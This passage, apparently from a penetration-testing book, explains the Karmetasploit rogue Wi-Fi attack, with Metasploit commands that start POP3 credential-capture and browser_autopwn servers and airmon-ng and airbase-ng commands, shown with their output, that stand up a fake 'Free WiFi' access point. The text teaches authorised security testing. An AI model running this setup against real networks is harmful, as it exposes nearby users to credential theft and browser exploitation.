background image

Karmetasploit

179

set SRVPORT 55550
set URIPATH /ads
run

use auxiliary/server/capture/pop3

set SRVPORT 110
set SSL false
run

After loading the database (

db_connect postgres:toor@127.0.0.1/msfbook

in which to store its results, KARMA loads the 

browser_autopwn

 server as shown 

at  . This is a handy way to attempt a number of exploits against a browser 
in an untargeted manner. A handful of the browser-based exploits in the 
Framework contain the directive 

include Msf::Exploit::Remote::BrowserAutopwn

Exploits that contain that include line will be attempted when the autopwn 
server is accessed.

At   and  , the local IP address is set to 

10.0.0.1

, which coincides with 

the default DHCP configuration. Then, in lines   and on, the various servers 
are configured and started. (To get a complete picture of what occurs in this 
attack, read the resource file.)

Next, we place our wireless card in monitor mode. The way in which we 

do this depends on our wireless card’s chipset. The wireless card in the fol-
lowing example uses the RT73 chipset. We use 

airmon-ng start wlan0

 to place 

it in monitor mode:

root@bt:/opt/metasploit3/msf3# 

airmon-ng start wlan0

NOTE

If your card uses a different chipset from the one used in this example, visit the 
Aircrack-ng website 

(http://www.aircrack-ng.org/)

 for specifics on how to place 

your card in monitor mode.

Launching the Attack

The 

airbase-ng

 component of the Aircrack-ng suite is used to create Karmeta-

sploit’s fake access point. In the next example, we configure the 

airbase-ng

 

access point to respond to all probes (

-P

), to beacon every 30 seconds (

-C 30

with the ESSID Free Wi-Fi (

-e "Free WiFi"

), and to be verbose (

-v

) using the 

interface 

mon0

:

root@bt:/opt/metasploit3/msf3# 

airbase-ng -P -C 30 -e "Free WiFi" -v mon0

14:06:57  Created tap interface 

at0

14:06:57  Trying to set MTU on at0 to 1500
14:06:57  Trying to set MTU on mon0 to 1800
14:06:57  Access Point with BSSID 00:21:29:E2:DE:14 started.

As you can see at  , Airbase-ng creates a new interface called 

at0

. Kar-

metasploit will use this interface.